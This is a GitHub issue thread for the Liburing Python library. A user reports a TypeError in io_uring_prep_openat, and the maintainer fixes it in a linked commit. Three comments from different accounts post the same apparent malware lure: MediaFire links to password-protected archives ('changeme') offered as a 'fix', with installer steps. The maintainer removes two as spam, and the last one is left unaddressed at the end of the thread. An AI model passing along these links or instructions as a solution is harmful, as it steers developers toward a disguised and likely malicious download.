### ISSUE TITLE
expected bytes, __common_define__ found

### ISSUE THREAD

**Issue by ZisIsNotZis** [YoSTEALTH/Liburing#20]
Hi, I got a wired issue when running example:

```
Traceback (most recent call last):
  File "/home/t/ring.py", line 73, in <module>
    main()
  File "/home/t/ring.py", line 57, in main
    fd = open(ring, cqes, '/tmp/liburing-test-file.txt', O_CREAT | O_RDWR)
  File "/home/t/ring.py", line 15, in open
    io_uring_prep_openat(sqe, dir_fd, _path, flags, mode)
  File "src/liburing/file.pyx", line 146, in liburing.file.io_uring_prep_openat
TypeError: expected bytes, __common_define__ found
```
Any body know how to solve this? Thanks!

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by YoSTEALTH** [comment]
deleted those messages, looks like spam?

Anyways @ZisIsNotZis let me see whats going on.

**Comment by YoSTEALTH** [comment]
@ZisIsNotZis fixed the bug https://github.com/YoSTEALTH/Liburing/commit/95769dc972a1dadd05aa8846012f153b33986dad

**Comment by ZisIsNotZis** [comment]
> @ZisIsNotZis fixed the bug [95769dc](https://github.com/YoSTEALTH/Liburing/commit/95769dc972a1dadd05aa8846012f153b33986dad)

Thanks! Now it works!  🎉

I never thought you could respond this quickly LOL

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
